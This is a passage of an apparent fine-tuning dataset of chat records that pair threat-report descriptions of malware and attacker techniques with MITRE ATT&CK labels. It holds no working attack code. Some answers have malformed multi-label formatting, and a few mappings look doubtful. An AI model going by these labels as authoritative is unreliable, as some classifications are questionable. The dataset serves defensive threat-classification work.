accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As our research technique of fingerprinting exploit writers exceeded our initial expectations, we were on the lookout for more exploits to investigate. Soon enough, we came across this blog post from Kaspersky detailing how Sodin (a.k.a Sodinokibi, or REvil), an infamous ransomware, is using a 1-Day exploit for CVE-2018-8453." }, { "role": "assistant", "content": "T1588.006 - Vulnerabilities', 'T1203 - Exploitation for Client Execution', 'T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon’s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers. Mimikatz - PowerShell and Binary versions, with multiple layers of obfuscation" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT has dropped binaries as files named microsoft_network.exe and crome.exe." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto presents an input prompt asking for the user's login and password." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before the driver is loaded, the malware disables crash dump by setting the following registry key" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "netsh can be used to discover system firewall settings." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook can collect the names of all files and folders in the Program Files directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker copies itself into the \"%systemroot%\\system32\" directory and registers as a service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used Base64-encoded strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is capable of the following functions: Collect file/folder/drive information Download files and additional malware Launch/terminate/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode — instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui/rOptimizer.dll.mui to extract the C&C information and connect to it" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials. WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt. The actors used the Nltest command to list domain controllers" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To establish persistence, identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1036 - Masquerading', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell can upload files over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkVishnya used PowerShell to create shellcode loaders." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has disabled event logging on compromised systems." }, { "role": "assistant", "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the computer name and checks the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds Registry Run keys to achieve persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit has several modules that search the Windows Registry for stored credentials: \"Get-UnattendedInstallFile\", \"Get-Webconfig\", \"Get-ApplicationHost\", \"Get-SiteListPassword\", \"Get-CachedGPPPassword\", and \"Get-RegistryAutoLogon\"." }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can delete previously created tasks on a compromised host." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury sequentially tries the generated domain names until it finds one that has a TXT record set by the operator. To verify the ownership of the domain, Ebury checks whether the TXT record can be decrypted using an RSA public key embedded in its code" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has compressed data before exfiltrating it using a tool called Abbrevia." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has registered itself as a service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also used different types of encryption in order to protect data in transit" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may collect permission group information by running net group /domain or a series of other commands on a victim." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can get a list of the processes and running tasks on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Following data collection, has compressed log files into a ZIP archive prior to staging and exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs local network connection discovery using \"netstat\"." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use a number of known techniques to bypass Windows UAC." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used application shim databases for persistence." }, { "role": "assistant", "content": "T1546.011 - Event Triggered Execution: Application Shimming" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT has a built-in keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL downloads another dropper from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used WMI for execution." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used 7-Zip to decode its Raindrop malware." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook is delivered via a malicious Word document inside a zip file." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3 shows a code excerpt from the embedded macro that checks which base64 blob should be decoded based on the iCheck variable, a Boolean value which is set to true if the victim system is running on a 64-bit system and false on a 32-bit system. If the system is found to be 64-bit, the base64 encoded blob on the left is decoded otherwise the base64 encoded blob on the right is decoded" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a command to collect and exfiltrate emails from Outlook." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use TLS to encrypt its C2 channel." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has collected the hostname of a compromised machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "build_downer can extract malware from a downloaded JPEG." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service" }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used HTTP and HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire contains modules that can discover and exploit search order hijacking vulnerabilities." }, { "role": "assistant", "content": "T1574.008 - Hijack Execution Flow: Path Interception by Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can use asynchronous procedure call (APC) injection to execute commands received from C2." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The back door Java file uses a custom class loader that loads encrypted class files (named Opcion[1-14]) as it receives commands from the RAT controller server. The key, specified by the attacker when creating the back door, is used to encrypt the class files using DES as a stream cipher" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Glimpse’s Agent Control Panel showing the interface actors would use to send commands The actor clicks the command to view the results in a popup window named “Result Viewer”" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LaZagne can obtain credential information running Linux processes." }, { "role": "assistant", "content": "T1003.007 - OS Credential Dumping: Proc Filesystem" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can enumerate the system drives and associated system name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has collected lists of names for individuals from targeted organizations." }, { "role": "assistant", "content": "T1589.003 - Employee Names" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The task is used to start an IronPython script with the 64-bit version of the interpreter. However, the key didn’t decrypt on any of the embedded files in the scripts we found. The task’s description is PythonUpdateSrvc and it runs either on Windows startup when a user logs in or when one of two system events get created" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"ZR\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can use AES encryption for C2 data transferred." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has used Base64 for encoded C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST was digitally signed by SolarWinds from March - May 2020." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dacls can use HTTPS in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use token manipulation to bypass UAC on Windows7 systems." 